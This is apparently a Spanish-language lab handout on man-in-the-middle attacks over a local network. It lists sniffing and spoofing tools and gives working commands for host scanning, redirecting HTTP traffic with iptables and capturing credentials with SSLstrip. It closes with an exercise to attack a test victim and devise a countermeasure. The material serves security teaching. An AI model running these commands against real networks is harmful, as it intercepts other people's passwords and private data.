Protocolos:
- TCP: Este protocolo est orientado a la conexin, permite
la multiplexacin mediante puertos (mapeo de puertos),
ms adelante veremos cmo se capturan paquetes TCP
cuando la vctima conecta con algn servidor. Tambin es
el encargado de fraccionar la informacin en datagramas
(paquetes) para su envo a travs del protocolo IP como
partes independientes (muy til cuando se producen fallos
en envos al reenviar slo el paquete que ha fallado).
- IP: Es utilizado por los protocolos de conexin (TCP) para
el envo y enrutamiento de los paquetes
El software necesario es el
siguiente:
- Wireshark (antiguo Ethereal) : Sniffer
- Paquete Dsniff: coleccin de herramientas para auditora
y test de penetracin de redes.
- Arpspoof: Aplicacin del paquete Dsniff para hacer arpspoofing
- SSLstrip: Aplicacin que permite capturar contraseas en
pginas https.
- Libreras WinPCap (para Windows) y Libcap (para Linux):
Libreras necesarias para la monitorizacin de redes.
Ejemplo
1-ifconfig
Ejecutamos en la terminal:
sudo apt-get install fping
Y despus escaneamos los hosts guardndolos en un archivo
"fping -a -g ipInicial IpFinal hosts" Ejemplo:
fping -a -g 192.168.1.1 192.168.1.254 hosts
Para finalmente leer la lista de hosts:
cat hosts
Terminal 2:
Redireccionamos el trafico http del puerto "80" al "8080"
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT
--to-ports 8080
Ejecutamos sslStrip indicandole "-w" que lo guarde en un archivo y "-l" que
escuche por el puerto 8080
sslstrip -w cap -l 8080
Terminal 3:
Finalmente el comando Tail para leer la informacin
tail -f cap
Prctica
Realizar un ataque man in the middle sobre un sitio local en un red local
con dos equipos (el atacante y la victima), se deber obtener como resultado
lo siguiente:
Los datos ingresados por el usuario en la aplicacin local que se tendrn que
visualizar en algn log de texto o con algn sniffer.
Crear una medida que solucione el ataque man in the middle.